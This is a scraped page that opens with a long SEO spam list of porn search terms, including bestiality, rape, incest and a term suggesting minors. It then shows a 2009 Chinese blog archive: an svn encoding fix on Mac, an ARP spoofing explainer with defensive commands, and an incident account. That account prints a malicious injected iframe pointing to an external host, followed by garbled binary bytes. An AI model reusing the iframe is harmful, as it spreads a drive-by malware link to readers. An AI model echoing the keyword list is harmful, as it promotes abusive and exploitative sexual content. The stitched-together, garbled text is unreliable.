erotik
yotube
tuberculosis bacterium
brazzerstube com
tou tube
yutube glasba
red tubecom
hqtube.com
gexo x tube
crush fetish tube
adult tube movies
tube teens
twin fuck tube
snake tube xxx
one sex tube
eskimotube.com
pornotube
xtube gay jizz
redetube
extremetube
bangtubecom
zoo sex tube
reed tube
www.nude tube.com
sex tubes
hard tube
u tube nudes
mytube
zoo tube com
rawtube
sex tube vids
download redtube videos
sluttube
adult tube sites
tivias tube
tiava s tube
porn tube sites
free sex porn tube
youporne
porn utube
tubehentai.com
utube porn
free beast tube horse sex
rapetube
www red tube.com
pornhub
fetishtube
kick boxing xtube
tuberose
bestiality zootube 365
zoo sex tube 365
free psp tubes adult
sexytube.com
xtube berlin toilette
japanese porntube
xtube nudist beach
animalporn tube
lesbian porn tube
tube
free sextube video
xtube videos
zootube.com
beastytube
pain tube
rude
milf tube
shockingtube.com
yuvutube
zoo tube 369
animals bestiality tube
utube enema viedo
cum tube
tubeteens.com
nude tube
yu tube
nudetube
beasttube zoo369
homemoviestube.com
british porn tube
sex tube sites
hot sexy tube
iyottube
xxx tubes
tube tops
beastiality tube free porn
dirtytube porn
pronotube
free porn tube.com
dancing xtube
pantypissing xtube
zootube 365 com
utube videos
redtube
z pornotube
gas tubes
redtube eu
8 tube porn
xtube big brothers
porn movie tube
nikki blond file tube
lube yor tube
best free porn tubes
studded tube manufacturers
free porn tube red hub
bluetube
panty pissing xtube
amateur porn tubes
4tube.com
tiavastube
german porn tube
redtube porn
tube365 com
redtube4
bootytube247
zootube beastiality
bizarre tube
porno tube xxx
pornotubexxx
rocket tube
zoo porn tube
zoosex tube
xtube ball
animaal sex tube
celeb boob tube
test tubes
maturetube.com
tube sexy videos
wank tubel
poohtube
www.tube8
red tube videos
mature tube
zootubecouk
pornotubecom
ourtube
ebony porn tube
yoy tube
poh tube
psp tubes
x tube warning
grannytube
free tube porn
freedom tube porn
adult tube online tv ksex m90 porn tube
shemale tubes
sexs tube
bdsmtube
sexy utube
yuo tube
porno tube beta
japanesetube
redtube competition
tubexxx
xtube spy college
anonymous redtube
nudist tube
fucktube.com
bbw tube
london tube map
free extreme pornotube
beast tube xxx
skim tube
fktube.com
famouspornstarstube.com
godtube
blacktube
redtube,com
tube xxx
8 tube
xtube football
mammothtube
porn tube.com
tube8.com
xtube romen
footfetishtube.com
lolita undressing tube
TUBESEX
free web tube
horse sex tube
jizztube
the boob tube
tube videos
tubegals.com
saving xtube videos
incest porn tube
zoosex tube 365
re tube ps
hentai tube
uporntube.com
bang tube com
twink tube
xtube
dog sex tube
filthtube
shushtube
hq tube.com
scat orgy tube 8
xtube.com
spanking tube
nudetube.com
uporn
hotutubes
tube8com
asian porn tube
pussytube
x.tube.com
tube8 videos vote
girl tube
amateur asian creampies red tube
croc tube
sextube.com
xtube cumming
rredtube
tree tube
teentube
beast tube
r tube
vacuum tube
porn 8 tube
tit tube
xnxx
xxx porn tube
black tube
zoostube
sex porn tube
dudetube
download xtube videos
enema u tubes
tube 8 bbw
tube8
inner tubes
redtube.com porn
hq.tube
peg tube
rde tube
boob tube
gay x tube
xtube sport boys
bondagetube
red porn tube
gay porn tube
tube porn
rtube
jeans pissing xtube
pornoytube
lubetube.com
solartube
pinktube
hardsextube
gaytube.com

Archive for 三月, 2009

Mac OS X 10.5.6中系统自带的svn版本是1.4.4,属于较老的svn版本了.
本来运行的好好的,后来重装过一次Mac OS X之后,svn里面处理中文文件夹和中文文件名的时候就出现乱码的情况了.
乱码表现为,中文文件名和文件夹名都是反斜线加数字的形式.
Terminal字符集设置
开始我以为是Terminal的字符集设置问题,只需要改成UTF-8即可:

这样做之后Terminal可以正常显示中文,但是svn还是不行.看来应该是svn的问题了.Google半天很少有结果,因为毕竟在svn里用中文的人就少,一来西方人多,二来正常的项目里面的文件和文件夹名,为了习惯,都采用英文.发现一个日本人的博客,根据里面间断的英文和数字版本号,我觉得他是在说一个svn针对UTF-8问题的patch.他说升级到1.5就没有问题了.
查了一下Mac OS X上svn最新版本是1.6.0,于是我的第一个想法是升级svn.
Mac OS X 10.5.6下升级svn (Subversion Client)
先装MacPorts.MacPorts可以理解成Mac OS X下的apt-get和yum.
注意,安装MacPorts 1.7.1的时候,最后一步”Running MacPorts 1.7.1 install script”的时候很慢,耐心等着,MacPorts需要下载些软件信息,网速不好的时候,这一步会很慢.当然,如果能做些提示就好了,我也是Force Quit两次,回来都卡住,才决定等下去…
MacPorts装好之后,安装svn就行:
sudo port install subversion
MacPorts会先装好依赖项,然后装好最新的subversion (svn),我昨晚装好是1.6.0:

zheng-lis-macbook-pro:SVNs nocoo$ svn –version
svn, version 1.6.0 (r36650)
compiled Mar 30 2009, 23:02:31

看看环境变量,做最关键的一步:
vim ~/.profile
这里前几行是MacPorts自动设置的一些东西,可以看到,MacPorts为我们装的东西都放在/opt/local/bin和/opt/local/sbin里面了.你需要在后面加最后一句,让svn以”zh_CN.UTF-8″编码去运行.

export PATH=/opt/local/bin:/opt/local/sbin:$PATH
export MANPATH=/opt/local/share/man:$MANPATH
alias svn='env LC_CTYPE=zh_CN.UTF-8 svn'

注意最后”svn status”的结果,这是升级前后两次同样的”svn mkdir 测试”的结果比较.之前一个就显示了乱码.
后记
当然,我现在猜想,如果不升级svn,之间在profile里加”alias svn=’env LC_CTYPE=zh_CN.UTF-8 svn’”,应该也行.不过木已成舟…

让我想起超级玛丽哦,最近晚上经常抱着PSP完NES模拟器,最爱游戏是超级玛丽和坦克大战…

一梦五十年

她的眼神,怎么形容呢…不过感觉很好~

那么它的眼神…

“I miss you the second you leave.”

ARP
ARP,即Address Resolution Protocol,地址解析协议,用于在局域网络中,将32位IP地址解析成48位MAC地址。因为在局域网络中,数据包的传递是基于MAC地址进行的,因此在局域网中,一台计算机(例如192.168.1.100)将一个数据包发往某个特定的IP(例如192.168.1.1)时,首先要做的就是找到这个IP所对应的MAC地址。
众所周知,MAC地址是和NIC绑定,而IP地址是可以配置的。因此ARP必须通过某种广播的形式实现。ARP进行的过程如下:

[192.168.1.100]: 都听着,谁的IP地址是192.168.1.1?
[192.168.1.101]: (不关我事,知道也不告诉你,保持静默)
[192.168.1.1]: 我是192.168.1.1,我的MAC地址是00-11-22-33-44-55。
[192.168.1.100]: (好,发给192.168.1.1的数据包应该发给00-11-22-33-44-55)

正常情况下的ARP进行就是这样简单。通过病毒的方式,可以让某一台主机,比如102101,可以相应别人的ARP请求。这样的情况下:

[192.168.1.100]: 都听着,谁的IP地址是192.168.1.1?
[192.168.1.101]: 我是192.168.1.1,我的MAC地址是00-AA-BB-CC-DD-EE。
[192.168.1.100]: (好,发给192.168.1.1的数据包应该发给00-AA-BB-CC-DD-EE)
[192.168.1.1]: 我是192.168.1.1,我的MAC地址是00-11-22-33-44-55。
[192.168.1.100]: (我已经知道192.168.1.1的MAC了,暂时不需要了)

在将来的一小段时间里,192.168.1.100会把本应发给192.168.1.1的数据包错误地发给了192.168.1.101,直到ARP缓存该更新的时候。
但是更新的时候,说不定192.168.1.101又抢在192.168.1.1前面响应了请求,那就继续错下去吧…如果192.168.1.1抢在前面,那么一小段时间里又恢复正常。
RARP
RARP是ARP的反协议,将48位MAC地址解析成32位IP地址。应用范围非常非常小,教科书上讲用于无盘工作站,这种计算机本地没有存储,一切都通过网络建立。那么它一开机的时候,因为没有本地存储,无从存储IP地址,只有写死在NIC里的MAC地址。下面的环境建立过程必须和某台服务器有关,而为了联系服务器,必须先有个IP地址。这时候,就会广播RARP,问下大家,我是00-11-22-33-44-55,我的IP应该是什么呢?然后某人返回一个IP,无盘工作站再用这个IP去联络别的服务器。
当然你会觉得RARP和DHCP,BOOTP差不多,都是将48位MAC地址解析成32位IP地址,分配IP的过程。其实RARP比DHCP,BOOTP老很多很多,而且仅限于局域网络。路由器是不会转发RARP包到别的网段的,而DHCP,BOOTP可以一级一级被转发。当然,DHCP,BOOTP绝对可以代替RARP,是RARP的超集。
ARP欺骗的后果
ARP欺骗一旦发生,造成的后果是三方面的。如果中毒计算机把自己伪装成网关,那么就能控制很多机器上网,原本发给网关的数据包发给了它。

拒绝服务(DoS):如果中毒计算机收到本应该网关转发出去的数据包,不再转发,那么其他计算机就不能上网了,看起来就是网关挂掉了。
信息泄露:中毒计算机默默地把数据包记录下来,然后继续转发给真正的网关,其他计算机在根本没有感觉的情况(除非一点点性能差异)下,数据就被人记录了,没有加密的数据就被第三方看到了。
木马,病毒和广告:中毒计算机把进出的数据包拆开来,在html页面前面或者后面(也可以中间,不过那样会影响性能啊,人家会发现的…)加点别的代码,指向木马,病毒或者广告,那么你上网或者你是服务器,你的客户就无端发现中毒或者多了个广告。

如何防范ARP欺骗
ARP欺骗的难度在于你把自己机器查了10000遍都找不到为什么错了。因为问题根本不在你机器上。
最简单的办法,绑定网关的IP地址和真正的MAC地址。在Linux下,使用这样的命令:
arp -s 网关IP地址 网关MAC地址
arp -s的效果不是持久的,重启之后就消失了。这样的设计是为了防止一旦绑定,网关NIC更换,或者MAC更换后,你就连不上了。
所以,如果你的网络环境是你自己可以控制的,你知道网关网卡不会经常换,或者换的时候你能看到或者得到通知的环境里,你可以把命令写在启动脚本里,这样ARP再广播你也不受影响。
另一种情况,你的网络环境不可预知,天知道什么时候换网关的MAC地址的情况,写死肯定不行。这种情况下…
arp -d 网关IP地址
这个命令是删除网关IP地址的ARP缓存用的,你可以反复执行这个命令,然后用arp命令观察网关MAC的变化,直到网络正常为止,那么那一个MAC是真正的网关MAC。你可以临时用arp -s锁一下。
当然存在这种可能,局域网内有101台机器,你是其中之一。网关也是其中之一。除了你们俩之外所有机器都中了ARP病毒,疯狂伪装自己成网关。在这种情况下,你得到网关MAC的几率是1%…这种时候你需要的是信念,人间正道是沧桑,天生我才必有用…总有一天,你能得到真正的网关MAC地址的。
还有一种可能,如果中毒的机器广播ARP的速率比网关默认的还快…换个机房吧。
当然,当发生ARP欺骗时,打电话骂机房和网管总是有道理的。因为原则上网管有这两项义务:

告知你当前网关真正MAC地址。
根据你提供的假网关MAC地址,寻找到其对应的真正机器,拔掉那台机器网线。

美好的夜晚,就在某人发来“晚安~”之后被ARP攻击毁掉了…
20:07:32,blue问我是不是对服务器进行操作了,页面显示不正常。
检查发现这样的状况:
<iframe src=http://f.ugt4d.cn/d1/13/index.htm width=100 height=0></iframe>‹������´VOo#5?©ßÁ5Rè2N²Ý²M2Alº‚E Tlpª<cÏŒµ{°=¤ˆÏÃXqZq¡’+Hœ¸pCâÎ… Ï3ùÛ¦¥ZÁ2cûýý½÷~ÎhÿäãÉô‹ÓÇ(s¹D§Ÿ>zúd‚p‡ÏîO9™ž Ïߟ~øõ‚.šª¬pB+*    yüF8s®RUUPÝ´IÉô2ó¶z^yñÙqšs ÷Z£Úã,—ʆ;ìôŽõF˜SæßN8ÉÇ’ÂÆåÅ>z—åB    æ6oY4ÑÊ
yPÅåˆ4 •sG‘÷Ñá_–â<Ä^+יΠŽQܬBìøÌïsˆâŒË]˜FÏë�¤PÏQfx œ¦ÜêÝÇ‘:*ˆ­ÅÈpbëæ’ÛŒs‡‘ õ�ñÆÈ2Q8$©JK0âè9}Voz¯”9°\&AA
Ä$†æÜ’«Ôeh?DÝ{諽Ö›2RÇÔ2—ùæÎp¯õõ^+)UìW)†Çî 4²1S    Åtµ’ /$y-Ð(H°=2Ëõ__#IŽ*Á\â£n£HÆMˆá3æR”1¡Ò?lÖ¶ q½öç’ZhˆÒÚP¾3[>nðxäØÒÏÃ.,‰c›{½îÆæõÓþ•µâÌÂs]NèQ.ÒÌ
»Å¬ö<n«ÈÃZÚ ²UˆBñˆ@Zj©k©ÍàÍž££a
×±â‚z‡Å¬YVyÀJ²!ÿüí«?üñë%@fÆ7zù— ®on¬S¼šÎ;}üŸîòŸh“#ÑL³ÚÂÔ(hôE­1¢uÆx1nA‘ï4£ιmÒB¥[ŒZ&ãjiÂ
†Ñ9•%|«~ÿ={~«xcv¥æo“†Á8ƒà+jÖN|kìÄ“J‘BÆW¹|ùÍå߃,“gë>¥ žô!ÿ´ÎwléÒµi^ =jµY˜ò„ó.kƒ70f0Æ|æµ€}¨IÄðYDöêǍßXŽ;ù‚çû?×áoT@ù+í1i`ªëv¶Þõâþ¼;Œ»Guc«_;\&!Öı¯-£\¸õD¥sZ­
úÓïè»—ž·GÄC>¾³7X×ß    Û©    œÚƒ{ÏÞ)•×€ãžØÆ?Ü›žºÖ×�>
P.S. 我之所以没有隐藏掉iframe里的src,完全是SEO需要,下一个中招的弟兄可以搜到这篇文章。我知道你年少轻狂,也别动去访问那一页的念头!
总之就是所有页面前面都被加了一个iframe,明显的ARP攻击症状。
搜索从来不删除邮件的Gmail,我发现上次ARP攻击之后,我们的真正网关的MAC被换过了…所以这也是我不想轻易执行arp -s绑定的原因:机房会换网关的,而一旦换了我们不知道,就回导致断网。
于是我只好不断执行arp命令查看当前的MAC,发现是错误的MAC,就执行以下命令清除ARP缓存:
arp -s 网关IP地址 网关真正的MAC地址
然而我悲壮地发现ARP缓存更新非常快,不到两分钟呢。我总不能一夜都手工干这个啊。于是我还是动了-s的念头。最终-s暂时躲过了这一劫,下面到了21点30分,例行宕机时间了…

浅尝辄止

In: 心情日记

26 2009

过气的帅茄子,公认的纯情大叔Rufus居然有着Count=13的List。
像我这样的人,是不是太过浅尝辄止了点~
也许中国人都如我一般懒惰,还是根本没有这样的环境。
想想而已,该做的还在继续做,而且没有任何想改变的意思~
“我们是糖,甜到悲伤。”
我在想,有几个人看得懂呢?一定有人说,真是个自恋的博主,其实我们大家都看得懂…

雷雨

In: 心情日记

22 2009

下雨啦,不奇怪。
睡着觉,竟然被雷吵醒,多少年来似是第一次呢。

打雷的时候,总是会想起儿时,那些仲夏。不喜欢下雨,因为下雨就不能出去玩了。蹲在姥爷家的阳台上,望着外面噗噗的雨,以及那些闪电,忘不了那些泥土混杂雨水的芬芳。这么些年过去了,终于再也寻不到。

效率

In: 心情日记

19 2009

今天再次体验到上海的办事效率。
上海无疑是我经历过的最有效率的城市,每个人都热爱自己的工作,并在自己的工作岗位上默默却出色地做着。在上海,最普通的工作人员,也许做着最平凡的事情,但也都是非常专业非常敬业的。如果你仔细观察一个人在工作,哪怕就是地铁里的清洁工,也会发现在专业素质背后的,属于他自己的一点小癖好,让人觉得不是那么生硬,而是一个活生生的人,以及他背后的家庭。
今天办护照,首先是同济大学本部的派出所,户籍证明迅速搞定,而且以前还收费的,现在也免掉了。我们办完之后并没急着离开,在等光光办好一起走,那时候他还没到。
我们去的上海市出入境管理局本部,上海科技馆那边那个办理的。还没出地铁站就开始看到大大的指示牌。
走过去,其实有点远。
领号,拍照,领表,填表,复印,快递,等号,办理,交回快递。
整个过程不超过40分钟,效率啊。
P.S. 我要去的是马尔代夫~